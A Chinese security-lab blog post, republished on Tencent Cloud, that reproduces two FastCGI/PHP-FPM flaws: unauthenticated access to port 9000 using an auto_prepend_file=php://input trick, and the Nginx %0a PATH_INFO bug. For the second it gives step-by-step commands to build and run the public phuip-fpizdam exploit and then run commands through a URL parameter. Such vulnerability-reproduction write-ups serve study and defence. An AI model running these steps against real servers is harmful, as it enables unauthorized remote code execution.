前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >FastCGI漏洞复现

FastCGI漏洞复现

作者头像
字节脉搏实验室
发布2020-08-28 15:35:17
2.2K0
发布2020-08-28 15:35:17
举报
文章被收录于专栏:字节脉搏实验室

文章源自【字节脉搏社区】-字节脉搏实验室

作者-Jadore

FastCGI之未授权访问

FastCGI是一个通信协议,可以用来进行数据交换,也即中间件和某个后端语言进行数据交换的协议。

PHP-FPM(FastCGI进程管理器):解析FastCGI协议,即当中间件将用户的请求按照FastCGI的规则打包好后传送给FPM进行解析。

Vul:PHP-FPM默认监听9000端口,如果该端口可访问,则攻击者可以构造FastCGI协议和FPM进行通信。

利用条件:

找到一个已存在的PHP文件

此处附上EXP:

auto_prepend_file = php://input,等于在执行任何php文件前都要包含一遍content的内容。所以,把待执行的代码放在content中,并且开启allow_url_include = On就能达到执行任意PHP代码。

使用exp去访问一个非php的文件会被拒绝

如果申请访问一个存在的php文件则

让其在执行PEAR.php文件之前包含某个文件达到命令执行的命令

FastCGI之任意命令执行

Vul:Nginx 上 fastcgi_split_path_info 在处理带有 %0a 的请求时,会因为遇到换行符 \n 导致 PATH_INFO 为空。而 php-fpm 在处理 PATH_INFO 为空的情况下,存在逻辑缺陷。攻击者通过精心的构造和利用,可以导致远程代码执行。

Nginx + php-fpm 的服务器,在使用如下配置的情况下,都可能存在远程代码执行漏洞:

Tsudo apt install golang-go

将export PATH=$PATH:/usr/local/go/bin添加至/etc/profile再执行source /etc/profile

EXP

go:git clone https://github.com/neex/phuip-fpizdam

命令:

go build

./phuip-fpizdam

go run . http://ip:8080/index.php

由于只有一部分进程能被污染因此需要多试几次

最后访问:

http://ip:8080/index.php?a=命令即可

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-08-21,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 字节脉搏实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
消息队列
腾讯云消息队列 TDMQ 是分布式架构中的重要组件,提供异步通信的基础能力,通过应用解耦降低系统复杂度,提升系统可用性和可扩展性。TDMQ 产品系列提供丰富的产品形态,包含 CKafka、RocketMQ、RabbitMQ、Pulsar、CMQ 五大产品,覆盖在线和离线场景,满足金融、互联网、教育、物流、能源等不同行业和场景的需求。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档